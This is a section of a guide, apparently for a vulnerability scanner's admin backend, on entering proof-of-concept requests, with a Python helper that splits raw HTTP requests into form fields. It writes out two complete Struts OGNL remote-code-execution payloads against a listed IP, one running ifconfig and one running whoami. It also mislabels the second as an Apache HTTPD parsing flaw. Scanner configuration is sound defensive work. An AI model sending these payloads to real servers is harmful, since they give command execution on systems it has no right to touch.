2. Adding vulnerability POCs (server-side admin backend)

Currently only single-step request-packet POCs are supported.

Example: Struts S2-053 RCE, adding a vulnerability whose Content-Type is the form format.


Starting from the request captured in Burp Suite, we trim the request down to:

POST /hello.action HTTP/1.1
Host: 43.138.83.231:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 981

redirectUri=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27ifconfig%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew+java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D%0D%0A

The request is split into the following parts:

Headers (request headers, not including cookies or content-type)
Cookies (request cookies)
Method (request method)
Content-type (content type)
Body (request body)
Path (request path)
TestDomain (a test domain that has the vulnerability; optional, useful for debugging)

Go to the backend and click POC list -> Add.

Compare against the request packet and fill each part into the corresponding field of the add form.


Special case: Apache HTTPD multi-extension parsing vulnerability as an example, adding a vulnerability whose Content-Type is the form format.

The vulnerability request is:

POST /index.action HTTP/1.1
Host: 43.138.83.231:8080
Content-Type: multipart/form-data; boundary=----b72256eb77cf961977440f8c972d92a2
Content-Length: 827

------b72256eb77cf961977440f8c972d92a2
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------b72256eb77cf961977440f8c972d92a2--

Content to add:

(Content type is file; Body is the entire body of the request packet.)


(Note that when adding the vulnerability you can already change the value after boundary to the unified standard b72256eb77cf961977440f8c972d92a2.)
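The splitting described above (request packet into Headers / Cookies / Method / Content-type / Body / Path / TestDomain) and the boundary normalisation from the note, as an added helper that is not part of the backend's own code. It assumes the Host header maps to TestDomain, that Content-Length is dropped because it is recomputed on send, and that the standard boundary token is stored exactly as b72256eb77cf961977440f8c972d92a2 in both the header and the body delimiters; the sample request below is constructed and carries a harmless body.

```python
import re
from typing import Dict

# Unified boundary value the note above recommends (assumption: used as the whole token).
STANDARD_BOUNDARY = "b72256eb77cf961977440f8c972d92a2"


def split_request(raw: str, normalize_boundary: bool = True) -> Dict[str, object]:
    """Split a raw HTTP request packet into the fields of the POC add form."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)          # body keeps its original CRLFs
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    cookies = content_type = test_domain = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip(), value.strip()
        lname = name.lower()
        if lname == "cookie":
            cookies = value                      # goes into the Cookies field
        elif lname == "content-type":
            content_type = value                 # goes into the Content-type field
        elif lname == "host":
            test_domain = value                  # assumption: Host -> TestDomain
        elif lname == "content-length":
            continue                             # recomputed by the sender, never stored
        else:
            headers[name] = value                # everything else is a plain Header
    if normalize_boundary and content_type.lower().startswith("multipart/form-data"):
        match = re.search(r"boundary=([^;\s]+)", content_type)
        if match:
            old = match.group(1)
            # Header and body must change together: body delimiters are "--" + boundary.
            content_type = content_type.replace(old, STANDARD_BOUNDARY)
            body = body.replace(old, STANDARD_BOUNDARY)
    return {"Method": method, "Path": path, "Content-type": content_type,
            "Cookies": cookies, "Headers": headers, "Body": body,
            "TestDomain": test_domain}


# Constructed sample multipart request (not a real target, harmless body).
SAMPLE_MULTIPART = (
    "POST /index.action HTTP/1.1\r\nHost: example.test:8080\r\n"
    "Cookie: a=1; b=2\r\nX-Token: abc\r\n"
    "Content-Type: multipart/form-data; boundary=----deadbeef\r\nContent-Length: 0\r\n\r\n"
    "------deadbeef\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\ntest\r\n"
    "------deadbeef--\r\n"
)

if __name__ == "__main__":
    for field, value in split_request(SAMPLE_MULTIPART).items():
        print(f"{field}: {value!r}")
```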

When the vulnerable request needs default Headers or default Cookies:


When the request packet cannot be used without these two token headers, add them in the second box of the specified content (separate multiple headers with ;).


When the request packet cannot be used without this cookie, add it in the first box of the specified content (separate multiple cookie key=value pairs with ;).